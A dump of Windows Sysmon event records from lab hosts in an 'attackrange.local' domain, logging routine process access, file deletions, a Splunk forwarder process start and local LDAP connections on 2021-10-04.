08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107052Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107051Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107050Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107049Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107048Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107047Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107046Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107045Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107044Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.055{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01C4CF1F14E9FB2E65727F9ED3AAE203,SHA256=E2638DC56E1CE79AA7A455E3F5A0585F8D477449FCBFF145389A2757A1000362,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107105Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.959{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107104Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.927{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107103Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.927{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107102Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.927{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107101Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.912{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107100Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.912{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107099Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.912{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107098Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.912{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000107097Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.312{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51871-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000107096Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.312{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51871-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000107095Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:57.450{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51870-false10.0.1.12-8000- 10341000x8000000000000000107094Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.578{58E9C193-B4BB-615A-4B02-00000000FC01}81608164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107093Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4BB-615A-4B02-00000000FC01}8160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107092Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107091Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107090Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B4BB-615A-4B02-00000000FC01}8160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107089Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107088Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107087Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4BB-615A-4B02-00000000FC01}8160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107086Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.326{58E9C193-B4BB-615A-4B02-00000000FC01}8160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107085Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44ECC009E2B3067893D62D8F82FCC0AD,SHA256=7C11ED877F66C7F16C633F7B56C27547F510A18375C649139BDE3906E722BCCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107084Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52ED75A5D670626A73D8183FB592594C,SHA256=57E67016C92393463AC66BF198DA12224B8EE975C14B70E19BAD9676C7DCCE64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107083Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:59.323{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A98D100534F6D9C10225DA420C62408B,SHA256=1803C8E613F9D321012E7799408426DCEB66AF711BD8F689AC2C2F8C74DB8E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083278Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.250{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08E9CC6C3B201F301C1A29EAD85314BD,SHA256=C9D808552C10D6916398B4ED3328C3EA4F0FCB5133B8FAF83891CB9881BBD989,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083277Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4BB-615A-8E01-00000000FD01}2736C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083276Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:59.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 